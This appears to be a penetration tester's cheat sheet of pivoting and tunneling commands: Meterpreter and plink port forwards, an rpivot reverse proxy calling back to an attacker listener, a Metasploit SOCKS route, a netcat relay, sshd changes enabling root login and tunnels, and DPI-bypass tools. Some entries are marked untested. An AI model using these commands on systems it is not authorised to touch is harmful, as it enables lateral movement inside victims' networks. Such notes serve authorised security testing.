Pivoting / tunneling

Local port forward

portfwd add -l <lport> -p <rport> -r <ip_target>
plink -l root -pw pass -R <lport>:127.0.0.1:<lport> <ip_target> -P <port> -N
ssh -D <lport> -p <rport> <ip_target>

Remote port forward

Rpivot

Listner attacker

python server.py --proxy-port <1080> --server-port <80> --server-ip <ip>

Target machine

python client.py --server-ip <ip> --server-port <80>

Proxy SOCKS

use auxiliary/server/socks4a
run -j
route add <ip/range> <session>

Then use proxychains (Full connected TCP)
ssh -D 127.0.0.1:1080 -i <key> <user>@<target_ip>

2 Hops

https://medium.com/@petergombos/smb-named-pipe-pivoting-in-meterpreter-462580fd41c5

Tunneling

SSH tunneling

SSH but /bin/false
Works with socks4/5

plink.exe -v -N -D localhost:<lport> <user>@<ip_target>
In burp: localhost + <lport>

VPN over SSH (not tested)

/etc/ssh/sshd_config
PermitRootLogin yes
PermitTunnel yes

ssh <user>@<ip> -w any:any
Encapsulate UDP in TCP stream (not tested)
socat -v UDP-LISTEN:<4444>,fork TCP:localhost:<4444>
Bypass DPI (not tested)
http_tunnel
stunnel
Netcat Relay
mknod backpipe p
nc -lp <inbound_port> 0<backpipe | nc 127.0.0.1 22 1>backpipe
ssh <login>@<target_machine> -p <inbound_port>
sshuttle
sshuttle -r <username>@<sshserver> <0.0.0.0/0>